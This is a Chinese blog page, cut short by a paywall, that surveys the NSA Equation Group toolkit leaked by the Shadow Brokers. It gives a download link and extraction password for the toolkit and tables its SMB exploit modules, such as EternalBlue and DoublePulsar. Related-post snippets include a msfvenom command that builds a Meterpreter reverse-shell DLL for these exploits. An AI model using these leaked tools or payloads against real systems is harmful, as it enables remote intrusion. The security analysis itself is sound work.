NSA方程式工具利用与分析

最新推荐文章于 2024-03-09 15:49:23 发布
最新推荐文章于 2024-03-09 15:49:23 发布
阅读量2.1w 收藏 26
点赞数 6
CC 4.0 BY-SA版权
分类专栏: 安全 文章标签: 漏洞 windows NSA工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/github_35681219/article/details/70664392
本文详细介绍了NSA泄露的工具,重点关注了ETERNALBLUE漏洞的利用原理,提供了复现步骤,并讲解了后渗透攻击策略。同时,给出了检测和防御这些攻击的方法,包括关闭不必要的端口、安装补丁以及使用特定脚本进行检测。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

下载地址https://yadi.sk/d/NJqzpqo_3GxZA4
解压密码:Reeeeeeeeeeeeeee
github下载地址https://github.com/misterch0c/shadowbroker

释放的工具总共包含三个文件夹,

  • Swift:包含了NSA对SWIFT银行系统发动攻击的相关证据,其中有EastNets的一些PPT文档、相关的证据、一些登录凭证和内部架构,EastNets是中东最大的SWIFT服务机构之一。
  • OddJob:包含一个基于Windows的植入软件,并包括所指定的配置文件和payload。适用于Windows Server 2003 Enterprise(甚至Windows XP Professional)
  • Windows:包含对Windows操作系统的许多黑客工具,但主要针对的是较旧版本的Windows(Windows XP中)和Server 2003。

主要工具

FUZZBUNCH:一款类似Metasploit的Exploit框架

模块 漏洞 影响系统 默认端口
Easypi IBM Lotus Notes漏洞 Windows NT, 2000 ,XP, 2003 3264
Easybee MDaemon WorldClient电子邮件服务器漏洞 WorldClient 9.5, 9.6, 10.0, 10.1
Eternalblue SMBv2漏洞(MS17-010) Windows XP(32),Windows Server 2008 R2(32/64),Windows 7(32/64) 139/445
Doublepulsar SMB和NBT漏洞 Windows XP(32), Vista, 7, Windows Server 2003, 2008, 2008 R2 139/445
Eternalromance SMBv1漏洞(MS17-010)和 NBT漏洞 Windows XP, Vista, 7, Windows Server 2003, 2008, 2008 R2 139/445
Eternalchampion SMB和NBT漏洞 Windows XP, Vista, 7, Windows Server 2003, 2008, 2008 R2, 2012, Windows 8 SP0 139/445
Eternalsynergy SMB和NBT漏洞 Windows 8, Windows Server 2012 139/445
Explodingcan IIS6.0远程利用漏洞
最低0.47元/天 解锁文章

200万优质内容无限畅学
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 9188
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
利用NSA方程式工具—“永恒之蓝”攻陷一台计算(MS17-010)
热门推荐
weixin_38948797的博客
01-27 2万+
利用方程式工具—“永恒之蓝”攻陷一台计算(MS17-010)  (注:本文章仅供技术交流和学习,请勿用于非法用途)     相信17年最大的安全事件比特币勒索病毒Wanncary没几个人不知道吧。那么究竟比特币勒索病毒究竟是怎么一回事呢?所谓比特币勒索病毒即:永恒之蓝漏洞利用程序+Wannacry勒索软件程序,也正是这两个武器造就了迄今为止最巨大的网络攻击勒索事件,影响到近百个国家上千家企业及
NSA的各种***工具
weixin_33674976的博客
10-24 337
这些工具代号都来自斯诺登的泄密文件:几乎各种信息收集手段都有,从电磁信号手机、屏幕信息收集,植入工具收集,到栅格电脑屏幕的光学收集、硬盘镜像,打印机数据窃听,USB无线网桥,以太网包双向注入工具,不一而足。HIGHLANDS: Collection from ImplantsVAGRANT: Collection of Computer ScreensMAGNETIC: Sensor Collec...
方程式工具包Linux,NSA工具包验证之SMB漏洞利用
weixin_31446915的博客
05-05 942
验证环境:攻击机1(本次演示IP:172.16.11.2):windows系统,安装python2.6.6, pywin32-221.win32-py2.6.exe, xshell, xftp, 下载方程式工具包放到C盘,在工具包目录下的windows目录新建文件夹”listeningposts”,并且开放所有端口关闭防火墙,确保内网可以访问之攻击机2(本次演示IP:172.16.12.2):ka...
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。方式可以直接打靶机,可以上传到跳板机执行。
NSA方程式泄漏工具包浅析
weixin_34117211的博客
09-19 1014
本文讲的是NSA方程式泄漏工具包浅析,前日,臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit.com博客上提供了相关消息。据此,腾讯云鼎实验室对此进行了分析。本次被公开的工具包大小为117.9MB,包含23个黑客工具,其中部分文件显示NSA曾入侵中东SWIFT银行系统,工具包下载接见文后参考信息。 解密后的工具包:...
方程式 Eternalblue 漏洞利用复现
VinK1的博客
04-19 6691
漏洞原理详细的漏洞原理参照文章: http://www.91ri.org/16946.html 懒得点连接的大人们可以看这里: 首先SrvOs2FeaListToNt首先调用SrvOs2FeaListSizeToNt计算pNtFea的大小。这里注意了SrvOs2FeaListSizeToNt函数会修改原始的pOs2Fea中的Length大小,本来Length是一个DWORD, 代码还强制转换
Bvp47美国NSA方程式的顶级后门
12-26
【Bvp47美国NSA方程式的顶级后门】是一种高级网络攻击工具,由美国国家安全局(NSA)的“方程式组织”所开发。该后门在2013年被奇安盘古实验室的研究人员首次发现,当时它在某国内要害部门的Linux平台上被用于复杂的...
ShadowBrokers方程式工具包浅析
BaymaxJW的博客
01-23 2644
一、解密后的工具包: 其中Windows目录包括Windows利用工具和相关攻击代码,swift目录中是银行攻击的一些证据,oddjob目录是植入后门等相关文档。 Windows目录:(包含了各种漏洞利用工具,在exploits中包含了丰富的漏洞利用工具,可影响windows多个平台) 三个比较重要的文件:exploits,fuzzbunch,specials A:exploits...
NSA武器库工具泄漏对网络安全的影响.pdf
09-20
此外,黑客组织“影子经纪人”从NSA下属的“方程式组织”窃取的文件中,包括了针对微软Windows系统和SWIFT系统的攻击工具。文档还提及了其他几种攻击工具,例如永恒王者、永恒浪漫、翡翠纤维等。这些工具的共同特点...
方程式445漏洞检测
11-12
方程式445批量检测工具(MS17-010) 全自动极速版。仅限于检测,请勿非法使用。
gorailgun-1.4.4beta1
06-08
gorailgun-1.4.4beta1 railgun网络渗透工具 密码为:railgun
gorailgun-1.3.8.zip
11-01
gorailgun最新版整理,懂的都知道,用过的都说好
第89篇:方程式工具包远程溢出漏洞图形界面版V0.3(内置永恒之蓝、永恒冠军、永恒浪漫等)...
最新发布
ABC_123的博客
03-09 936
Part1 前言大家好,我是ABC_123。我从年前到现在,一直在整理曾经写过的红队工具,逐步把自己认为比较好用的原创工具发出来给大家用一用,方便大家在日常的攻防比赛、红队评估项目中解放双手,节省时间精力和体力。本期给大家分享的就是我在2018年左右编写的方程式工具包的各种溢出漏洞的图形界面版,个人一直在更新,一直在用。注:方程式工具包的针对windows系统的各种溢出漏洞,有很多使用技巧,所...
永恒之蓝方程式利用工具使用教程
weixin_44400900的博客
11-07 1686
永恒之蓝方程式利用工具使用教程
方程式0day图形化利用工具
weixin_30786657的博客
04-18 2134
最近方程式漏洞着实活了一把,分析了下githup上面的文件目录,找到了利用文件,主要是针对windows主机的SMB、RDP协议进行攻击,因为我主要根据他们提供的payload的程序,利用这两个模块eternalblue和Doublepulsar可以对攻击smb和rdp协议,其他的没写,基本上一样的吧,程序主界面如下图: 简单说下实现过程,仔细翻过的朋友肯定看到其中的.exe文...
一款集成度高的渗透工具Railgun
深入交流学习:webMsec
06-13 7420
Railgun为一款GUI界面的渗透工具,将部分人工经验转换为自动化,集成了渗透过程中常用到的一些功能 目前集成了端口扫描、端口爆破、web指纹扫描、漏洞扫描、漏洞利用以及编码转换功能。 信息收集 端口扫描 界面如下 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LjQyOIhY-1623550020985)(https://image.3001.net/images/20210517/1621256630_60a269b634375ad903802.png!small)]
关于BCrypt在Rails中 用户密码 加密解密的方法
如需咨询可联系我,V:chen2318341674
01-27 587
用户输入的密码加密: BCrypt::Password.create(“用户输入的密码”) 校验用户输入的密码和原先加密值是否一致:BCrypt::Password.new(“原先加密的值”) == “用户输入的密码” ? true : false 在我测试的时候发现:devise-v4.4.3 是采用的BCrypt原理,二者数据可以互通【devise-v4.4.3加密的值可通过Bcrypt解密,二者加密的值格式也一致】 ...
渗透攻防必备工具(基础篇,收藏起来)
告白的博客
01-09 1万+
0x00 简介 在黑盒测试的渗透测试项目,HW等进行渗透测试会使用到那些工具?下面做一个简短的常见基础篇工具使用介绍, 0x01 信息收集篇 综合信息收集工具railgun github项目地址:https://github.com/lz520520/railgun Railgun 为一款 GUI 界面的渗透工具,将部分人工经验转换为自动化,集成了渗透过程中常用到的一些功能,目前集成了端口扫描、端破、 web 指纹扫描、漏洞扫描、漏洞利用以及编码转换功能,后续会持续更新。 端口扫描:Nmap 项目地址:
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值